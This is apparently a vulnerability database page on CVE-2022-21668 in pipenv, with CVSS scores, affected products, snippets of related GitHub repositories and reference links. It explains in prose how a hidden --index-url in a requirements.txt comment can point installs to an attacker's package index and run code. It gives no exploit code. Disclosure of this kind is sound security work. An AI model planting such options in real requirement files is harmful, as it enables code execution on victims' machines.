Published: 10/01/2022 Updated: 07/02/2024

CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6

CVSS v3 Base Score: 8.6 | Impact Score: 6 | Exploitability Score: 1.8

VMScore: 829

Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

pipenv is a Python development workflow tool. Starting with version 2018.10.9 and prior to version 2022.1.8, a flaw in pipenv's parsing of requirements files allows an malicious user to insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims' systems. If an attacker is able to hide a malicious `--index-url` option in a requirements file that a victim installs with pipenv, the attacker can embed arbitrary malicious code in packages served from their malicious index server that will be executed on the victim's host during installation (remote code execution/RCE). When pip installs from a source distribution, any code in the setup.py is executed by the install process. This issue is patched in version 2022.1.8. The GitHub Security Advisory contains more information about this vulnerability.

Vulnerable Product	Search on Vulmon	Subscribe to Product
pypa pipenv
fedoraproject fedora 34
fedoraproject fedora 35
fedoraproject fedora 36

hello_world_python This is a demonstration of the pipenv vulnerability CVE-2022-21668 cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2022-21668 DO NOT USE THIS REPOSITORY It is only for example use To run the code run: pipenv install -r requirementstxt This will install the packages needed to run the hello_world_pythonpy file And if you're lucky it might install some

My CVE, bug bounty, and general cybersec relevant reading list and notes Misc Links National Vulnerability Database: here NVD CVE search: here NVD data feeds listing: here CVE details CVSS distribution listing: here Mitre CVE search: here Pentesterland list of bug bounty writeups: here JFrog security research blogroll: here vuldb listing: here 2022 March Title

CVE-2022-21668-Pipenv-RCE-vulnerability 1 Introduction In this document the Pipenv vulnerability(CVE-2022-21668) is discussed in detail The following sections cover the bug code in pipenv/utilspy file which opens up the door for various RCE attacks and also about the recent fix which validates the SSL/TLS connection and check the hostname against a list of trusted hosts 1

CWE-190 CWE-1284 https://github.com/pypa/pipenv/releases/tag/v2022.1.8 https://github.com/pypa/pipenv/security/advisories/GHSA-qc9x-gjcv-465w https://github.com/pypa/pipenv/commit/439782a8ae36c4762c88e43d5f0d8e563371b46f https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QHQRIWKDP3SVJABAPEXBIQPKDI6UP7G4/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KCROBYHUS6DKQPCXBRPCZ5CDBNQTYAWT/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/56HBA3EOSLEDNCCBJVHE6DO34P56EOUM/https://nvd.nist.gov https://github.com/jacksont432/hello_world_python

CVE-2022-21668

Vulnerability Summary

Vulnerability Trend

Github Repositories

References

Vulmon Search

About

Products

Connect